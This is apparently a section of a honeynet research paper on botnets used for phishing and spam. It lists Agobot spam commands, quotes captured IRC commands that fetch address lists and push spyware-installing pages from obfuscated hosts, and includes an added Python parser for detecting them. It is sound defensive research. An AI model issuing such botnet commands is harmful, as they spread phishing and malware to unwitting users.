Phishing Technique Three - Phishing Using Botnets

The recent white paper by the Honeynet Project called "KYE: Tracking Botnets" introduced a method to track botnets. A botnet is a network of compromised computers that can be remotely controlled by an attacker. Due to their immense size (tens of thousands of systems can be linked together), botnets can pose a severe threat to the community when used for Denial-of-Service (DoS) attacks. Initial research in this area demonstrated that botnets are sometimes used to send out spam emails and can also be used for phishing attacks. During a study in October 2004, email security company CipherTrust suggested that 70% of monitored phishing spam was sent through one of five active botnets, but our own observations suggest that many more botnets are in use for spam operations. Although not the analysis of one single incident, in this section we present our observations on the tools and techniques used by attackers engaged in phishing via botnets.

Incident Timeline

During the period between September 2004 and January 2005, the German Honeynet Project deployed a series of un-patched Microsoft Windows based honeypots to observe botnet activity. An automated process was developed to allow honeypots to be repeatedly deployed, compromised and shutdown for forensic analysis. During this period over 100 separate botnets were observed and thousands of files were captured for offline analysis.

Analysis

Some versions of bot software captured during this research project provided the capability to remotely start a SOCKS v4/v5 proxy on a compromised host. SOCKS provides a generic proxy mechanism for TCP/IP-based networking applications (RFC 1928) and can be used to proxy most popular Internet traffic, such as HTTP or SMTP email. If an attacker with access to a botnet enables the SOCKS proxy functionality on a remote bot, this machine can then be used to send bulk spam email. If the botnet contains many thousands of compromised hosts, an attacker is then able to send massive amounts of bulk email very easily, often from a wide range of IP addresses owned by unsuspecting home PC users.

The lack of a central point of contact and the range of international boundaries crossed could make it very difficult to trace and stop such activity, making it of low risk, but potentially high reward to spammers and phishers. Perhaps unsurprisingly, resourceful botnet owners have begun to target criminal activity and it is now possible to rent a botnet. For a fee, the botnet operator will provide a customer with a list of SOCKS v4 capable server IP addresses and ports. There are documented cases where botnets were sold to spammers as spam-relays: "Uncovered: Trojans as Spam Robots". Some captured bot software also implemented a special function to harvest email-addresses or to send spam via bots. The following listing shows some of the commands related to sending spam/phishing emails implemented in Agobot, a popular bot used by attackers and a variant regularly captured during our research:

  • harvest.emails - "makes the bot get a list of emails"
  • harvest.emailshttp - "makes the bot get a list of emails via HTTP"
  • spam.setlist - "downloads an email list"
  • spam.settemplate - "downloads an email template"
  • spam.start - "starts spamming"
  • spam.stop - "stops spamming"
  • aolspam.setlist - "AOL - downloads an email list"
  • aolspam.settemplate - "AOL - downloads an email template"
  • aolspam.setuser - "AOL - sets a username"
  • aolspam.setpass - "AOL - sets a password"
  • aolspam.start - "AOL - starts spamming"
  • aolspam.stop - "AOL - stops spamming"

Further information about how these commands are implemented can be found in a side note about the source code of bots. With the help of drone, a customised IRC client developed by the German Honeynet Project, we were able to learn more about how bots are used for spam/phishing email attacks by smuggling a fake client into a botnet, using the connection data collected through the attacks against our honeynets. A number of typical examples of observed activity are shown below.

Example 1

Within one particular botnet we observed an attacker who issued the following command (please note that the URLs have been obfuscated):

<St0n3y> .mm http://www.example.com/email/fetch.php?4a005aec5d7dbe3b01c75aab2b1c9991 http://www.foobar.net/pay.html Joe did_u_send_me_this

The command .mm ("mass emailing") is a customized version of the generic spam.start command. This command accepts four parameters:

  1. A URL for a file that contains several email addresses.
  2. The web page to target within the spam email - this could be a normal spam web-page or a phishing web site.
  3. The name of the sender.
  4. The subject of the email.

In this case, the fetch.php script returned 30 different email addresses every time it was invoked. To each of these recipients, an email message was constructed that advertised the second parameter of the command. In this example, it pointed to a web-page which attempted to install an ActiveX component on the victim's computer.

Example 2

In another botnet we observed the installation of Browser Helper Objects on a victim's PC:

[TOPIC] #spam9 :.open http://amateur.example.com/l33tag3/beta.html -s

The .open command tells each bot to open the requested web-page and display it to the victim. In this case the web-page contained a Browser Helper Object (BHO) that would attempt to install itself on the victim's computer. As the channel name indicates, this botnet was also used for sending spam.
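As an added example (not part of the original paper or the drone client), the following Python parser applies the command grammar described in Examples 1 and 2 to captured IRC C&C traffic: it recognises the four-parameter .mm command and the .open command, and extracts the URLs a defender would want to block or investigate. The log line format and the sample lines are constructed to mirror the two captures shown above.

```python
import re
from dataclasses import dataclass, field

# Observed command shapes (see Examples 1 and 2 above):
#   .mm <address-list URL> <target URL> <sender name> <subject>
#   .open <URL> [-flags]
# Log lines are assumed to be either "<nick> .cmd args" (channel message)
# or "[TOPIC] #chan :.cmd args" (channel topic), as in the captures.
IRC_PRIVMSG = re.compile(r"^<(?P<nick>[^>]+)>\s+(?P<cmd>\.\w+)\s*(?P<args>.*)$")
IRC_TOPIC = re.compile(r"^\[TOPIC\]\s+(?P<chan>#\S+)\s+:(?P<cmd>\.\w+)\s*(?P<args>.*)$")
URL = re.compile(r"https?://\S+")

@dataclass
class Alert:
    source: str                 # nick or channel that carried the command
    command: str
    urls: list = field(default_factory=list)   # indicators to block/investigate
    details: dict = field(default_factory=dict)

def parse_line(line):
    """Return an Alert for a known spam/phishing C&C command, else None."""
    m = IRC_PRIVMSG.match(line) or IRC_TOPIC.match(line)
    if not m:
        return None
    cmd, args = m.group("cmd"), m.group("args").split()
    source = m.group("nick") if "nick" in m.groupdict() else m.group("chan")
    if cmd == ".mm" and len(args) >= 4:
        # First two parameters are the address-list URL and the advertised URL.
        return Alert(source, cmd, URL.findall(" ".join(args[:2])),
                     {"sender": args[2], "subject": " ".join(args[3:])})
    if cmd == ".open" and args:
        flags = [a for a in args[1:] if a.startswith("-")]
        return Alert(source, cmd, URL.findall(args[0]), {"flags": flags})
    return None

def scan(lines):
    """Run the parser over a captured log and keep only matching commands."""
    return [a for a in (parse_line(l) for l in lines) if a]

# Constructed sample log, modelled on the two captures quoted above.
SAMPLE_LOG = [
    "<St0n3y> .mm http://www.example.com/email/fetch.php?4a005aec5d7dbe3b01c75aab2b1c9991 http://www.foobar.net/pay.html Joe did_u_send_me_this",
    "<St0n3y> hello all",
    "[TOPIC] #spam9 :.open http://amateur.example.com/l33tag3/beta.html -s",
    "<bot42> .status",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```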

Example 3

In another botnet we observed examples of spyware propagation:

http://public.example.com/prompt.php?h=6d799fbeef3a9b386587f5f7b37f[...]

This link was found during analysis of captured malware. It directs the victim to the web-page of a company that offers "free ad delivery software which provides targeted advertising offers". This web site contains several pages that try to install ActiveX components on visiting clients, presumably adware or spyware.